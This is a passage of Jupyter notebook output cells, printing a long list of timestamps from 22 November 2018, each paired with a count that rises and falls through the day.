"['2018-11-22 08:25:39.821412', 14]\n",
"['2018-11-22 08:26:18.989392', 12]\n",
"['2018-11-22 08:26:28.789299', 13]\n",
"['2018-11-22 08:26:38.311609', 12]\n",
"['2018-11-22 08:26:46.307482', 13]\n",
"['2018-11-22 08:26:49.068349', 14]\n",
"['2018-11-22 08:27:13.186842', 13]\n",
"['2018-11-22 08:27:17.619462', 14]\n",
"['2018-11-22 08:28:06.812041', 13]\n",
"['2018-11-22 08:28:28.673783', 12]\n",
"['2018-11-22 08:29:06.404751', 11]\n",
"['2018-11-22 08:29:14.730298', 12]\n",
"['2018-11-22 08:29:41.775064', 11]\n",
"['2018-11-22 08:29:53.851605', 12]\n",
"['2018-11-22 08:31:34.938285', 11]\n",
"['2018-11-22 08:31:39.391920', 10]\n",
"['2018-11-22 08:32:23.079510', 9]\n",
"['2018-11-22 08:32:37.684792', 8]\n",
"['2018-11-22 08:33:21.333548', 7]\n",
"['2018-11-22 08:34:20.902954', 6]\n",
"['2018-11-22 08:36:23.146569', 5]\n",
"['2018-11-22 08:38:25.568897', 6]\n",
"['2018-11-22 08:39:54.943093', 7]\n",
"['2018-11-22 08:42:35.373055', 6]\n",
"['2018-11-22 08:44:24.432369', 5]\n",
"['2018-11-22 08:48:19.980429', 6]\n",
"['2018-11-22 08:49:31.713534', 5]\n",
"['2018-11-22 08:50:12.375880', 6]\n",
"['2018-11-22 08:52:23.804801', 5]\n",
"['2018-11-22 08:54:45.078736', 4]\n",
"['2018-11-22 08:54:50.362228', 3]\n",
"['2018-11-22 09:00:51.176292', 2]\n",
"['2018-11-22 09:02:17.324424', 3]\n",
"['2018-11-22 09:05:49.002795', 4]\n",
"['2018-11-22 09:09:19.434083', 3]\n",
"['2018-11-22 09:15:35.310834', 4]\n",
"['2018-11-22 09:16:52.342060', 3]\n",
"['2018-11-22 09:20:07.824350', 4]\n",
"['2018-11-22 09:20:22.928519', 5]\n",
"['2018-11-22 09:22:01.808474', 6]\n",
"['2018-11-22 09:24:18.157976', 5]\n",
"['2018-11-22 09:28:59.596630', 4]\n",
"['2018-11-22 09:30:35.538022', 5]\n",
"['2018-11-22 09:30:36.843544', 6]\n",
"['2018-11-22 09:30:45.535744', 7]\n",
"['2018-11-22 09:30:52.026213', 8]\n",
"['2018-11-22 09:31:28.695001', 9]\n",
"['2018-11-22 09:31:54.453357', 8]\n",
"['2018-11-22 09:32:50.684863', 9]\n",
"['2018-11-22 09:34:10.172919', 10]\n",
"['2018-11-22 09:34:13.378341', 11]\n",
"['2018-11-22 09:34:18.980826', 12]\n",
"['2018-11-22 09:34:27.675210', 13]\n",
"['2018-11-22 09:34:37.941474', 12]\n",
"['2018-11-22 09:34:39.941125', 10]\n",
"['2018-11-22 09:34:52.467380', 11]\n",
"['2018-11-22 09:34:58.447331', 12]\n",
"['2018-11-22 09:35:00.257497', 13]\n",
"['2018-11-22 09:35:01.062971', 14]\n",
"['2018-11-22 09:35:06.665959', 15]\n",
"['2018-11-22 09:36:52.707953', 14]\n",
"['2018-11-22 09:38:10.736902', 13]\n",
"['2018-11-22 09:39:07.579838', 12]\n",
"['2018-11-22 09:39:54.283197', 11]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 09:40:03.864650', 9]\n",
"['2018-11-22 09:40:21.306576', 7]\n",
"['2018-11-22 09:40:29.560863', 8]\n",
"['2018-11-22 09:40:35.722308', 9]\n",
"['2018-11-22 09:40:39.114360', 8]\n",
"['2018-11-22 09:40:54.112970', 7]\n",
"['2018-11-22 09:41:37.396429', 8]\n",
"['2018-11-22 09:41:52.818965', 9]\n",
"['2018-11-22 09:42:59.541612', 8]\n",
"['2018-11-22 09:44:52.294839', 7]\n",
"['2018-11-22 09:45:09.733535', 5]\n",
"['2018-11-22 09:45:46.004824', 4]\n",
"['2018-11-22 09:47:27.973044', 3]\n",
"['2018-11-22 09:53:16.893209', 2]\n",
"['2018-11-22 10:01:51.185914', 3]\n",
"['2018-11-22 10:05:20.458090', 4]\n",
"['2018-11-22 10:06:38.095409', 5]\n",
"['2018-11-22 10:08:47.501227', 6]\n",
"['2018-11-22 10:09:23.521820', 5]\n",
"['2018-11-22 10:10:10.057720', 6]\n",
"['2018-11-22 10:10:21.303743', 7]\n",
"['2018-11-22 10:11:09.617147', 8]\n",
"['2018-11-22 10:11:09.878132', 9]\n",
"['2018-11-22 10:11:12.612951', 10]\n",
"['2018-11-22 10:11:19.109172', 11]\n",
"['2018-11-22 10:11:19.527545', 12]\n",
"['2018-11-22 10:11:39.626172', 13]\n",
"['2018-11-22 10:11:47.713316', 14]\n",
"['2018-11-22 10:11:59.734987', 15]\n",
"['2018-11-22 10:12:39.782212', 16]\n",
"['2018-11-22 10:13:00.221903', 17]\n",
"['2018-11-22 10:13:06.326507', 18]\n",
"['2018-11-22 10:14:19.314312', 17]\n",
"['2018-11-22 10:14:23.549821', 16]\n",
"['2018-11-22 10:14:37.315700', 17]\n",
"['2018-11-22 10:15:17.347018', 16]\n",
"['2018-11-22 10:15:22.306286', 17]\n",
"['2018-11-22 10:15:36.789245', 16]\n",
"['2018-11-22 10:16:00.210966', 14]\n",
"['2018-11-22 10:17:19.641683', 13]\n",
"['2018-11-22 10:18:01.093390', 14]\n",
"['2018-11-22 10:18:51.469683', 13]\n",
"['2018-11-22 10:18:55.379549', 12]\n",
"['2018-11-22 10:19:04.034273', 13]\n",
"['2018-11-22 10:19:06.476317', 12]\n",
"['2018-11-22 10:19:06.863104', 13]\n",
"['2018-11-22 10:19:20.705036', 12]\n",
"['2018-11-22 10:19:23.558719', 11]\n",
"['2018-11-22 10:19:44.711071', 10]\n",
"['2018-11-22 10:19:45.941089', 11]\n",
"['2018-11-22 10:20:00.977963', 10]\n",
"['2018-11-22 10:20:15.977130', 9]\n",
"['2018-11-22 10:20:38.253803', 10]\n",
"['2018-11-22 10:21:10.169760', 11]\n",
"['2018-11-22 10:21:11.432946', 12]\n",
"['2018-11-22 10:22:59.177804', 11]\n",
"['2018-11-22 10:23:01.423141', 12]\n",
"['2018-11-22 10:23:05.398146', 11]\n",
"['2018-11-22 10:23:26.698511', 12]\n",
"['2018-11-22 10:23:40.802806', 11]\n",
"['2018-11-22 10:23:55.404974', 12]\n",
"['2018-11-22 10:24:42.580612', 13]\n",
"['2018-11-22 10:24:51.687895', 14]\n",
"['2018-11-22 10:24:59.107745', 15]\n",
"['2018-11-22 10:25:11.290558', 14]\n",
"['2018-11-22 10:26:18.944246', 13]\n",
"['2018-11-22 10:26:48.995013', 12]\n",
"['2018-11-22 10:27:30.085839', 11]\n",
"['2018-11-22 10:27:56.231678', 10]\n",
"['2018-11-22 10:28:21.309090', 11]\n",
"['2018-11-22 10:28:28.357370', 12]\n",
"['2018-11-22 10:28:43.874715', 13]\n",
"['2018-11-22 10:28:46.608394', 14]\n",
"['2018-11-22 10:29:26.308408', 15]\n",
"['2018-11-22 10:29:54.941423', 16]\n",
"['2018-11-22 10:29:58.961958', 15]\n",
"['2018-11-22 10:30:31.403405', 16]\n",
"['2018-11-22 10:31:35.076309', 15]\n",
"['2018-11-22 10:32:20.433366', 14]\n",
"['2018-11-22 10:32:59.476197', 13]\n",
"['2018-11-22 10:33:16.649642', 14]\n",
"['2018-11-22 10:33:27.719269', 13]\n",
"['2018-11-22 10:33:29.711667', 12]\n",
"['2018-11-22 10:34:43.436570', 11]\n",
"['2018-11-22 10:35:39.885732', 10]\n",
"['2018-11-22 10:37:19.193654', 9]\n",
"['2018-11-22 10:37:24.868555', 8]\n",
"['2018-11-22 10:38:29.064690', 7]\n",
"['2018-11-22 10:38:49.250643', 8]\n",
"['2018-11-22 10:39:04.718905', 7]\n",
"['2018-11-22 10:39:24.627713', 8]\n",
"['2018-11-22 10:40:21.822124', 7]\n",
"['2018-11-22 10:40:35.056015', 8]\n",
"['2018-11-22 10:40:37.364328', 9]\n",
"['2018-11-22 10:40:59.376572', 10]\n",
"['2018-11-22 10:45:14.490811', 8]\n",
"['2018-11-22 10:45:24.707648', 7]\n",
"['2018-11-22 10:48:10.922849', 8]\n",
"['2018-11-22 10:48:53.965784', 9]\n",
"['2018-11-22 10:48:56.628398', 10]\n",
"['2018-11-22 10:49:29.202094', 9]\n",
"['2018-11-22 10:49:50.376350', 10]\n",
"['2018-11-22 10:51:21.200522', 11]\n",
"['2018-11-22 10:51:32.464311', 12]\n",
"['2018-11-22 10:52:47.288603', 10]\n",
"['2018-11-22 10:55:24.953235', 5]\n",
"['2018-11-22 10:55:31.741935', 4]\n",
"['2018-11-22 10:55:32.991477', 3]\n",
"['2018-11-22 10:59:48.929688', 4]\n",
"['2018-11-22 10:59:58.784982', 5]\n",
"['2018-11-22 11:00:01.927428', 6]\n",
"['2018-11-22 11:00:07.250843', 7]\n",
"['2018-11-22 11:00:12.126081', 8]\n",
"['2018-11-22 11:00:31.087568', 7]\n",
"['2018-11-22 11:01:11.747216', 8]\n",
"['2018-11-22 11:01:26.702138', 7]\n",
"['2018-11-22 11:01:55.041278', 8]\n",
"['2018-11-22 11:04:05.152703', 7]\n",
"['2018-11-22 11:04:08.050118', 6]\n",
"['2018-11-22 11:04:19.274808', 7]\n",
"['2018-11-22 11:04:45.192911', 6]\n",
"['2018-11-22 11:08:23.055507', 5]\n",
"['2018-11-22 11:11:26.784241', 6]\n",
"['2018-11-22 11:12:46.319651', 5]\n",
"['2018-11-22 11:13:42.605908', 6]\n",
"['2018-11-22 11:13:43.998090', 7]\n",
"['2018-11-22 11:15:59.496820', 8]\n",
"['2018-11-22 11:17:52.955921', 7]\n",
"['2018-11-22 11:17:58.775143', 8]\n",
"['2018-11-22 11:18:17.704604', 9]\n",
"['2018-11-22 11:19:24.716839', 10]\n",
"['2018-11-22 11:19:54.186200', 9]\n",
"['2018-11-22 11:19:59.435775', 8]\n",
"['2018-11-22 11:20:02.365596', 7]\n",
"['2018-11-22 11:20:10.696884', 8]\n",
"['2018-11-22 11:20:59.502697', 9]\n",
"['2018-11-22 11:22:43.486580', 10]\n",
"['2018-11-22 11:24:27.925105', 9]\n",
"['2018-11-22 11:24:46.892380', 10]\n",
"['2018-11-22 11:25:40.238471', 11]\n",
"['2018-11-22 11:26:33.807955', 10]\n",
"['2018-11-22 11:26:39.417281', 11]\n",
"['2018-11-22 11:26:45.266276', 10]\n",
"['2018-11-22 11:28:11.808053', 11]\n",
"['2018-11-22 11:28:15.259540', 12]\n",
"['2018-11-22 11:28:19.334563', 13]\n",
"['2018-11-22 11:28:44.224135', 14]\n",
"['2018-11-22 11:28:56.919682', 13]\n",
"['2018-11-22 11:29:11.833069', 12]\n",
"['2018-11-22 11:29:41.870146', 11]\n",
"['2018-11-22 11:30:14.211112', 12]\n",
"['2018-11-22 11:31:01.454948', 11]\n",
"['2018-11-22 11:31:10.603008', 12]\n",
"['2018-11-22 11:31:20.757392', 13]\n",
"['2018-11-22 11:31:25.420672', 14]\n",
"['2018-11-22 11:31:54.483204', 13]\n",
"['2018-11-22 11:32:41.606153', 12]\n",
"['2018-11-22 11:33:17.277755', 13]\n",
"['2018-11-22 11:33:42.021579', 12]\n",
"['2018-11-22 11:33:45.361906', 13]\n",
"['2018-11-22 11:33:52.496310', 14]\n",
"['2018-11-22 11:34:10.131282', 15]\n",
"['2018-11-22 11:34:26.162747', 14]\n",
"['2018-11-22 11:34:51.484945', 15]\n",
"['2018-11-22 11:35:45.274638', 14]\n",
"['2018-11-22 11:35:57.977402', 15]\n",
"['2018-11-22 11:36:39.050378', 14]\n",
"['2018-11-22 11:36:50.384329', 13]\n",
"['2018-11-22 11:37:41.407316', 12]\n",
"['2018-11-22 11:37:46.054982', 11]\n",
"['2018-11-22 11:37:59.098593', 10]\n",
"['2018-11-22 11:38:08.763770', 9]\n",
"['2018-11-22 11:38:09.806302', 10]\n",
"['2018-11-22 11:38:29.003316', 11]\n",
"['2018-11-22 11:38:54.810114', 10]\n",
"['2018-11-22 11:40:30.166129', 9]\n",
"['2018-11-22 11:40:47.676132', 10]\n",
"['2018-11-22 11:40:49.195080', 11]\n",
"['2018-11-22 11:42:54.239934', 10]\n",
"['2018-11-22 11:43:04.896945', 8]\n",
"['2018-11-22 11:43:18.041207', 7]\n",
"['2018-11-22 11:43:41.416088', 6]\n",
"['2018-11-22 11:44:37.664187', 5]\n",
"['2018-11-22 11:45:52.294827', 3]\n",
"['2018-11-22 12:02:55.841083', 2]\n",
"['2018-11-22 12:03:48.889970', 3]\n",
"['2018-11-22 12:03:52.230564', 4]\n",
"['2018-11-22 12:03:55.126315', 5]\n",
"['2018-11-22 12:07:55.380366', 4]\n",
"['2018-11-22 12:13:05.820285', 5]\n",
"['2018-11-22 12:13:45.276173', 6]\n",
"['2018-11-22 12:13:47.773980', 7]\n",
"['2018-11-22 12:13:48.394441', 8]\n",
"['2018-11-22 12:13:50.720776', 9]\n",
"['2018-11-22 12:14:01.291714', 10]\n",
"['2018-11-22 12:14:09.690983', 11]\n",
"['2018-11-22 12:14:55.026292', 12]\n",
"['2018-11-22 12:15:05.185178', 13]\n",
"['2018-11-22 12:15:19.533114', 14]\n",
"['2018-11-22 12:15:51.234410', 15]\n",
"['2018-11-22 12:16:31.462309', 16]\n",
"['2018-11-22 12:16:54.013070', 17]\n",
"['2018-11-22 12:17:11.276388', 16]\n",
"['2018-11-22 12:17:30.243443', 15]\n",
"['2018-11-22 12:17:49.860438', 14]\n",
"['2018-11-22 12:19:16.784068', 15]\n",
"['2018-11-22 12:19:16.953822', 16]\n",
"['2018-11-22 12:19:19.666192', 15]\n",
"['2018-11-22 12:19:22.198398', 14]\n",
"['2018-11-22 12:19:24.733958', 15]\n",
"['2018-11-22 12:19:29.338791', 16]\n",
"['2018-11-22 12:19:30.421829', 17]\n",
"['2018-11-22 12:19:45.388164', 16]\n",
"['2018-11-22 12:19:58.754111', 15]\n",
"['2018-11-22 12:20:29.779752', 14]\n",
"['2018-11-22 12:20:40.418690', 13]\n",
"['2018-11-22 12:20:52.428080', 12]\n",
"['2018-11-22 12:21:22.600102', 11]\n",
"['2018-11-22 12:21:28.286750', 12]\n",
"['2018-11-22 12:21:33.617560', 13]\n",
"['2018-11-22 12:21:53.243978', 14]\n",
"['2018-11-22 12:21:56.790676', 15]\n",
"['2018-11-22 12:22:31.880580', 14]\n",
"['2018-11-22 12:23:12.626491', 13]\n",
"['2018-11-22 12:23:13.772140', 14]\n",
"['2018-11-22 12:23:29.675188', 13]\n",
"['2018-11-22 12:24:06.663177', 11]\n",
"['2018-11-22 12:24:25.586768', 9]\n",
"['2018-11-22 12:25:01.421586', 10]\n",
"['2018-11-22 12:25:27.881500', 11]\n",
"['2018-11-22 12:26:15.039841', 12]\n",
"['2018-11-22 12:26:24.985389', 13]\n",
"['2018-11-22 12:26:30.558684', 14]\n",
"['2018-11-22 12:26:45.370224', 13]\n",
"['2018-11-22 12:27:06.134838', 10]\n",
"['2018-11-22 12:27:40.198341', 9]\n",
"['2018-11-22 12:28:29.161282', 10]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 12:29:01.650901', 9]\n",
"['2018-11-22 12:29:30.539214', 10]\n",
"['2018-11-22 12:29:56.780413', 11]\n",
"['2018-11-22 12:30:26.809917', 10]\n",
"['2018-11-22 12:30:39.144029', 9]\n",
"['2018-11-22 12:30:56.830152', 8]\n",
"['2018-11-22 12:31:13.671920', 9]\n",
"['2018-11-22 12:31:29.672319', 10]\n",
"['2018-11-22 12:33:53.101719', 6]\n",
"['2018-11-22 12:34:35.064803', 5]\n",
"['2018-11-22 12:35:20.826725', 3]\n",
"['2018-11-22 12:38:20.608032', 4]\n",
"['2018-11-22 12:39:35.678322', 3]\n",
"['2018-11-22 12:50:39.001100', 4]\n",
"['2018-11-22 12:53:10.440780', 5]\n",
"['2018-11-22 12:54:40.433163', 4]\n",
"['2018-11-22 12:55:24.444039', 3]\n",
"['2018-11-22 12:57:31.840552', 4]\n",
"['2018-11-22 12:59:09.717229', 5]\n",
"['2018-11-22 12:59:28.287572', 6]\n",
"['2018-11-22 12:59:39.042380', 7]\n",
"['2018-11-22 13:00:22.669114', 8]\n",
"['2018-11-22 13:00:39.697342', 9]\n",
"['2018-11-22 13:01:38.632356', 10]\n",
"['2018-11-22 13:02:33.860006', 9]\n",
"['2018-11-22 13:02:40.816694', 8]\n",
"['2018-11-22 13:03:20.672346', 7]\n",
"['2018-11-22 13:04:54.445560', 6]\n",
"['2018-11-22 13:06:25.628804', 7]\n",
"['2018-11-22 13:07:07.080850', 8]\n",
"['2018-11-22 13:07:16.346897', 7]\n",
"['2018-11-22 13:08:20.695761', 8]\n",
"['2018-11-22 13:09:37.564820', 9]\n",
"['2018-11-22 13:12:33.366382', 10]\n",
"['2018-11-22 13:14:13.343371', 11]\n",
"['2018-11-22 13:14:39.280169', 12]\n",
"['2018-11-22 13:16:34.563910', 11]\n",
"['2018-11-22 13:18:01.603788', 12]\n",
"['2018-11-22 13:18:40.612429', 13]\n",
"['2018-11-22 13:18:48.737596', 12]\n",
"['2018-11-22 13:19:05.631232', 13]\n",
"['2018-11-22 13:19:10.499628', 14]\n",
"['2018-11-22 13:19:20.659095', 13]\n",
"['2018-11-22 13:19:28.452657', 12]\n",
"['2018-11-22 13:20:58.039963', 13]\n",
"['2018-11-22 13:21:37.981849', 12]\n",
"['2018-11-22 13:22:11.881820', 13]\n",
"['2018-11-22 13:22:12.592279', 14]\n",
"['2018-11-22 13:22:39.500669', 15]\n",
"['2018-11-22 13:23:10.980031', 13]\n",
"['2018-11-22 13:23:11.198417', 14]\n",
"['2018-11-22 13:23:20.686626', 15]\n",
"['2018-11-22 13:23:24.046906', 16]\n",
"['2018-11-22 13:23:29.776052', 15]\n",
"['2018-11-22 13:23:31.866638', 16]\n",
"['2018-11-22 13:23:44.851889', 15]\n",
"['2018-11-22 13:24:12.253463', 14]\n",
"['2018-11-22 13:24:15.747296', 15]\n",
"['2018-11-22 13:25:14.249885', 14]\n",
"['2018-11-22 13:26:08.950607', 15]\n",
"['2018-11-22 13:26:32.282428', 16]\n",
"['2018-11-22 13:27:04.384417', 15]\n",
"['2018-11-22 13:27:30.539068', 14]\n",
"['2018-11-22 13:27:41.153730', 13]\n",
"['2018-11-22 13:29:36.173674', 14]\n",
"['2018-11-22 13:30:06.047292', 13]\n",
"['2018-11-22 13:30:16.319573', 14]\n",
"['2018-11-22 13:30:39.130208', 13]\n",
"['2018-11-22 13:30:52.073310', 14]\n",
"['2018-11-22 13:30:58.457943', 13]\n",
"['2018-11-22 13:30:59.872162', 14]\n",
"['2018-11-22 13:31:30.580673', 13]\n",
"['2018-11-22 13:31:44.855444', 12]\n",
"['2018-11-22 13:31:46.907059', 11]\n",
"['2018-11-22 13:32:14.255063', 12]\n",
"['2018-11-22 13:32:15.353790', 13]\n",
"['2018-11-22 13:32:33.847139', 14]\n",
"['2018-11-22 13:32:43.313070', 15]\n",
"['2018-11-22 13:32:56.891590', 16]\n",
"['2018-11-22 13:32:58.176967', 17]\n",
"['2018-11-22 13:33:09.564321', 16]\n",
"['2018-11-22 13:33:24.489085', 17]\n",
"['2018-11-22 13:33:39.232892', 16]\n",
"['2018-11-22 13:34:32.636745', 15]\n",
"['2018-11-22 13:35:04.929228', 14]\n",
"['2018-11-22 13:36:02.194032', 13]\n",
"['2018-11-22 13:36:50.698680', 12]\n",
"['2018-11-22 13:37:10.096914', 13]\n",
"['2018-11-22 13:37:17.208762', 14]\n",
"['2018-11-22 13:37:48.834753', 11]\n",
"['2018-11-22 13:37:52.089194', 12]\n",
"['2018-11-22 13:38:00.745312', 13]\n",
"['2018-11-22 13:38:40.208733', 11]\n",
"['2018-11-22 13:38:52.742944', 12]\n",
"['2018-11-22 13:39:07.416911', 11]\n",
"['2018-11-22 13:41:05.458910', 12]\n",
"['2018-11-22 13:41:51.760298', 13]\n",
"['2018-11-22 13:42:02.522220', 12]\n",
"['2018-11-22 13:42:06.994406', 11]\n",
"['2018-11-22 13:43:59.308951', 10]\n",
"['2018-11-22 13:44:57.614882', 11]\n",
"['2018-11-22 13:45:33.549244', 10]\n",
"['2018-11-22 13:46:02.528295', 9]\n",
"['2018-11-22 13:47:24.891172', 8]\n",
"['2018-11-22 13:49:10.895439', 7]\n",
"['2018-11-22 13:52:04.646165', 5]\n",
"['2018-11-22 13:54:49.502981', 4]\n",
"['2018-11-22 14:00:18.755163', 3]\n",
"['2018-11-22 14:04:38.242652', 2]\n",
"['2018-11-22 14:05:22.667893', 3]\n",
"['2018-11-22 14:05:41.986141', 4]\n",
"['2018-11-22 14:06:16.676750', 5]\n",
"['2018-11-22 14:06:18.779131', 6]\n",
"['2018-11-22 14:06:38.714728', 7]\n",
"['2018-11-22 14:06:41.447868', 8]\n",
"['2018-11-22 14:07:34.653731', 9]\n",
"['2018-11-22 14:10:07.237398', 8]\n",
"['2018-11-22 14:10:55.308129', 6]\n",
"['2018-11-22 14:10:58.533691', 7]\n",
"['2018-11-22 14:11:04.085020', 8]\n",
"['2018-11-22 14:11:08.806838', 9]\n",
"['2018-11-22 14:11:10.860992', 10]\n",
"['2018-11-22 14:11:11.200503', 11]\n",
"['2018-11-22 14:11:15.280206', 12]\n",
"['2018-11-22 14:11:16.758585', 13]\n",
"['2018-11-22 14:11:19.778569', 14]\n",
"['2018-11-22 14:11:25.756946', 15]\n",
"['2018-11-22 14:11:36.141892', 16]\n",
"['2018-11-22 14:11:37.887852', 17]\n",
"['2018-11-22 14:11:38.343037', 18]\n",
"['2018-11-22 14:11:39.735905', 19]\n",
"['2018-11-22 14:11:47.828209', 20]\n",
"['2018-11-22 14:11:55.018222', 21]\n",
"['2018-11-22 14:12:00.869630', 22]\n",
"['2018-11-22 14:12:05.543976', 23]\n",
"['2018-11-22 14:12:05.991282', 24]\n",
"['2018-11-22 14:12:10.708061', 25]\n",
"['2018-11-22 14:12:17.234780', 26]\n",
"['2018-11-22 14:12:41.321535', 27]\n",
"['2018-11-22 14:13:11.791647', 28]\n",
"['2018-11-22 14:13:31.622031', 29]\n",
"['2018-11-22 14:13:37.318582', 30]\n",
"['2018-11-22 14:14:07.786816', 31]\n",
"['2018-11-22 14:14:27.690556', 30]\n",
"['2018-11-22 14:14:50.586703', 31]\n",
"['2018-11-22 14:14:52.046744', 32]\n",
"['2018-11-22 14:14:53.123306', 33]\n",
"['2018-11-22 14:15:05.326318', 32]\n",
"['2018-11-22 14:15:19.467000', 31]\n",
"['2018-11-22 14:15:24.798779', 30]\n",
"['2018-11-22 14:15:26.642655', 31]\n",
"['2018-11-22 14:15:33.199416', 32]\n",
"['2018-11-22 14:15:33.221361', 33]\n",
"['2018-11-22 14:15:36.872112', 31]\n",
"['2018-11-22 14:15:40.425803', 32]\n",
"['2018-11-22 14:16:01.606288', 31]\n",
"['2018-11-22 14:16:36.225867', 32]\n",
"['2018-11-22 14:17:14.621017', 31]\n",
"['2018-11-22 14:17:14.789164', 32]\n",
"['2018-11-22 14:18:23.245358', 28]\n",
"['2018-11-22 14:18:32.424757', 27]\n",
"['2018-11-22 14:19:07.690574', 26]\n",
"['2018-11-22 14:19:19.401400', 27]\n",
"['2018-11-22 14:19:20.926113', 26]\n",
"['2018-11-22 14:19:34.987851', 25]\n",
"['2018-11-22 14:19:39.249025', 24]\n",
"['2018-11-22 14:19:50.979401', 23]\n",
"['2018-11-22 14:19:53.092936', 24]\n",
"['2018-11-22 14:19:56.816915', 23]\n",
"['2018-11-22 14:20:02.664103', 21]\n",
"['2018-11-22 14:20:05.636381', 22]\n",
"['2018-11-22 14:20:05.776684', 23]\n",
"['2018-11-22 14:20:09.696663', 22]\n",
"['2018-11-22 14:20:18.907801', 21]\n",
"['2018-11-22 14:20:21.966179', 20]\n",
"['2018-11-22 14:20:23.000734', 21]\n",
"['2018-11-22 14:20:27.232361', 22]\n",
"['2018-11-22 14:20:28.066518', 20]\n",
"['2018-11-22 14:20:37.426212', 19]\n",
"['2018-11-22 14:20:49.163736', 18]\n",
"['2018-11-22 14:21:06.040834', 19]\n",
"['2018-11-22 14:21:18.434248', 18]\n",
"['2018-11-22 14:21:24.243249', 17]\n",
"['2018-11-22 14:21:28.770151', 18]\n",
"['2018-11-22 14:22:01.127764', 19]\n",
"['2018-11-22 14:22:43.737324', 18]\n",
"['2018-11-22 14:22:49.567328', 17]\n",
"['2018-11-22 14:23:05.677685', 16]\n",
"['2018-11-22 14:23:09.262483', 17]\n",
"['2018-11-22 14:23:24.033322', 16]\n",
"['2018-11-22 14:23:41.843843', 17]\n",
"['2018-11-22 14:23:57.377072', 16]\n",
"['2018-11-22 14:24:13.398790', 15]\n",
"['2018-11-22 14:24:33.117816', 16]\n",
"['2018-11-22 14:24:47.845947', 17]\n",
"['2018-11-22 14:25:06.669196', 16]\n",
"['2018-11-22 14:25:31.612366', 13]\n",
"['2018-11-22 14:25:38.646508', 14]\n",
"['2018-11-22 14:26:21.632864', 13]\n",
"['2018-11-22 14:27:10.311664', 12]\n",
"['2018-11-22 14:28:27.654765', 13]\n",
"['2018-11-22 14:28:51.070040', 12]\n",
"['2018-11-22 14:29:40.944912', 13]\n",
"['2018-11-22 14:29:46.612275', 14]\n",
"['2018-11-22 14:29:58.647577', 15]\n",
"['2018-11-22 14:30:06.958070', 16]\n",
"['2018-11-22 14:31:21.375254', 15]\n",
"['2018-11-22 14:32:14.349855', 16]\n",
"['2018-11-22 14:32:40.912187', 15]\n",
"['2018-11-22 14:34:03.635026', 14]\n",
"['2018-11-22 14:34:14.851122', 13]\n",
"['2018-11-22 14:34:25.938826', 14]\n",
"['2018-11-22 14:34:27.772540', 13]\n",
"['2018-11-22 14:35:05.931244', 12]\n",
"['2018-11-22 14:35:25.335880', 13]\n",
"['2018-11-22 14:35:40.502939', 14]\n",
"['2018-11-22 14:35:43.682890', 15]\n",
"['2018-11-22 14:36:12.906911', 16]\n",
"['2018-11-22 14:37:31.564426', 15]\n",
"['2018-11-22 14:37:45.636770', 14]\n",
"['2018-11-22 14:38:06.214079', 15]\n",
"['2018-11-22 14:38:13.751233', 16]\n",
"['2018-11-22 14:38:34.784597', 14]\n",
"['2018-11-22 14:38:41.210413', 15]\n",
"['2018-11-22 14:39:18.403401', 16]\n",
"['2018-11-22 14:41:10.616049', 17]\n",
"['2018-11-22 14:41:29.209931', 16]\n",
"['2018-11-22 14:42:04.711010', 17]\n",
"['2018-11-22 14:43:08.519702', 16]\n",
"['2018-11-22 14:44:11.192206', 17]\n",
"['2018-11-22 14:44:25.733902', 16]\n",
"['2018-11-22 14:44:58.329149', 17]\n",
"['2018-11-22 14:45:01.069409', 16]\n",
"['2018-11-22 14:45:17.757557', 13]\n",
"['2018-11-22 14:45:25.243029', 12]\n",
"['2018-11-22 14:45:42.831721', 11]\n",
"['2018-11-22 14:46:21.767782', 10]\n",
"['2018-11-22 14:47:11.550605', 9]\n",
"['2018-11-22 14:47:40.578517', 10]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 14:48:40.818351', 7]\n",
"['2018-11-22 14:51:40.665381', 5]\n",
"['2018-11-22 14:53:47.044001', 4]\n",
"['2018-11-22 14:54:19.351517', 5]\n",
"['2018-11-22 14:55:46.650931', 6]\n",
"['2018-11-22 14:57:59.709557', 5]\n",
"['2018-11-22 14:58:17.553574', 6]\n",
"['2018-11-22 14:59:30.675920', 7]\n",
"['2018-11-22 15:00:59.635835', 8]\n",
"['2018-11-22 15:01:48.568852', 9]\n",
"['2018-11-22 15:01:51.944651', 10]\n",
"['2018-11-22 15:01:59.992550', 11]\n",
"['2018-11-22 15:02:12.031364', 12]\n",
"['2018-11-22 15:02:40.176867', 11]\n",
"['2018-11-22 15:03:03.044385', 12]\n",
"['2018-11-22 15:03:13.950610', 13]\n",
"['2018-11-22 15:03:24.858574', 12]\n",
"['2018-11-22 15:03:28.341038', 11]\n",
"['2018-11-22 15:03:32.651150', 12]\n",
"['2018-11-22 15:03:42.472157', 11]\n",
"['2018-11-22 15:04:19.796257', 12]\n",
"['2018-11-22 15:05:39.239826', 11]\n",
"['2018-11-22 15:06:47.490452', 10]\n",
"['2018-11-22 15:07:08.096842', 7]\n",
"['2018-11-22 15:08:13.813695', 6]\n",
"['2018-11-22 15:09:16.448024', 5]\n",
"['2018-11-22 15:09:50.615082', 6]\n",
"['2018-11-22 15:10:00.856763', 7]\n",
"['2018-11-22 15:10:22.648588', 6]\n",
"['2018-11-22 15:11:05.901526', 7]\n",
"['2018-11-22 15:11:26.799393', 8]\n",
"['2018-11-22 15:12:13.192811', 9]\n",
"['2018-11-22 15:14:35.988209', 10]\n",
"['2018-11-22 15:14:37.705342', 11]\n",
"['2018-11-22 15:15:10.863782', 12]\n",
"['2018-11-22 15:15:31.617338', 11]\n",
"['2018-11-22 15:16:13.777530', 10]\n",
"['2018-11-22 15:16:29.161111', 11]\n",
"['2018-11-22 15:16:48.906327', 10]\n",
"['2018-11-22 15:17:11.314229', 11]\n",
"['2018-11-22 15:17:39.338407', 12]\n",
"['2018-11-22 15:18:52.421771', 13]\n",
"['2018-11-22 15:18:57.097519', 14]\n",
"['2018-11-22 15:19:27.032263', 13]\n",
"['2018-11-22 15:20:39.938585', 11]\n",
"['2018-11-22 15:21:27.053063', 10]\n",
"['2018-11-22 15:22:09.782145', 11]\n",
"['2018-11-22 15:22:17.153328', 10]\n",
"['2018-11-22 15:22:49.788522', 11]\n",
"['2018-11-22 15:23:34.166825', 12]\n",
"['2018-11-22 15:24:02.595701', 11]\n",
"['2018-11-22 15:24:14.916942', 12]\n",
"['2018-11-22 15:24:27.833087', 11]\n",
"['2018-11-22 15:24:30.194571', 10]\n",
"['2018-11-22 15:25:36.231132', 11]\n",
"['2018-11-22 15:25:51.691400', 10]\n",
